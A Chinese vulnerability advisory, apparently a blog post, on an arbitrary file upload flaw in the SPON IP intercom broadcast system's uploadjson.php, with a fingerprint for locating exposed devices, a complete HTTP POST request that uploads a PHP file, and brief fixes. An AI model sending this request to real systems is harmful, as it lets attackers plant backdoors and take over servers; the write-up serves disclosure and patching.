世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统uploadjson.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Content-Length: 61

jsondata[filename]=7788.php&jsondata[data]=<?php echo 'ok';?>

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
123过去19 小时前
wifi-honey使用教程
linux·网络·测试工具
志栋智能19 小时前
低成本自动化巡检:7×24小时守护业务稳定
运维·网络·自动化
还是做不到嘛\.21 小时前
Dvwa靶场-SQL Injection
数据库·sql·web安全
CDN36021 小时前
360CDN 全系列产品体验:CDN / 高防 / SDK 游戏盾横向测评
运维·安全·游戏
小陈工21 小时前
2026年3月26日技术资讯洞察:WebAssembly崛起、AI代码质量危机与开源安全新挑战
人工智能·python·安全·架构·开源·fastapi·wasm
tang777891 天前
小红书平台用什么代理 IP 比较好?2026年3月实测数据 + 选型推荐
网络·爬虫·python·网络协议·tcp/ip·数据挖掘·ip
LlNingyu1 天前
文艺复兴,什么是XSS,常见形式(一)
前端·安全·web安全·xss
wheelmouse77881 天前
网络排查基础与实战指南:Ping 与 Telnet
开发语言·网络·php
OxyTheCrack1 天前
深入浅出TCP拥塞控制技术
网络·tcp/ip
LlNingyu1 天前
文艺复兴,什么是XSS,常见形式(二)
前端·安全·xss